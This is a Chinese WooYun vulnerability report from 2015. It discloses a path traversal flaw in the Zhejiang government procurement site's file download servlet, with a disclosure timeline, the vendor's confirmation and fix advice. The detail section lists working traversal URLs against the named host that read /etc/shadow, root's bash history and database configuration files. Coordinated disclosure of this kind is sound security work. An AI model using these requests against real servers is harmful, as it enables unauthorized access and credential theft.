当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110975

漏洞标题:浙江省政府采购网高权限任意文件下载

相关厂商:浙江政府采购网

漏洞作者: 小红猪

提交时间:2015-04-29 21:06

修复时间:2015-06-18 10:04

公开时间:2015-06-18 10:04

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-29: 细节已通知厂商并且等待厂商处理中
2015-05-04: 厂商已经确认,细节仅向厂商公开
2015-05-14: 细节向核心白帽子及相关领域专家公开
2015-05-24: 细节向普通白帽子公开
2015-06-03: 细节向实习白帽子公开
2015-06-18: 细节向公众公开

简要描述:

浙江省政府采购网root权限任意文件下载。

详细说明:

站点域名:www.zjzfcg.gov.cn
属于浙江省财政厅浙江政府采购网。
存在一处任意文件下载漏洞。存在问题的位置:

1.1.jpg


正常的下载文件的链接类似:
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=GP_PROJ_ZBWJ/1238119231178.doc&fileShowName
如此便可想到构造如下链接:
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/passwd&fileShowName
结果如下图:

1.jpg


发现确实可以下载到/etc/passwd文件,内容如下:

3.jpg


下载/etc/shadow文件:
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/shadow&fileShowName
内容如下:

4.jpg


下载网络配置文件:
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0&fileShowName
内容如下:

5.jpg


下载.bash_history文件:
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../root/.bash_history&fileShowName
内容如下:

6.jpg


可以看到root权限下可下载操作系统上的任意,严重地威胁到操作系统及web服务的安全运行。
从bash_history文件里获取到网站目录,接着下载web.xml配置文件:
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../..//home/weblogic/bea/user_projects/domains/webcluster/applications/webapp/WEB-INF/web.xml&fileShowName

7.png


数据库配置文件:
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../../home/apache-tomcat-5.5.33/webapps/new/WEB-INF/classes/jdbc.properties&fileShowName

8.png


漏洞证明:

下载passwd文件:
http://www.zjzfcg.gov.cn/DownloadServlet?fileName=/../../../../../../../../../etc/passwd&fileShowName

3.jpg

修复方案:

建议开发人员对DownloadServlet功能对应的代码进行审核,对客户端提交的文件名进行安全检查及过滤。
1)对fileName的取值范围进行严格限制,比如只允许访问特定的目录,其他目录都禁止访问,从权限上严格控制;
2) 对文件名进行硬编码,将文件名转换成固定长度的字符串序列,并采用白名单方式对文件名后缀进行限制,另外在网站上发现attactments目录,也可采 用这种方式将提供下载的文件放置于特定目录,链接至该目录下载。

版权声明:转载请注明来源 小红猪@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-05-04 10:02

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-18 10:50 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    我就特别想要知道你怎么知道的?这个不是公司内部的么?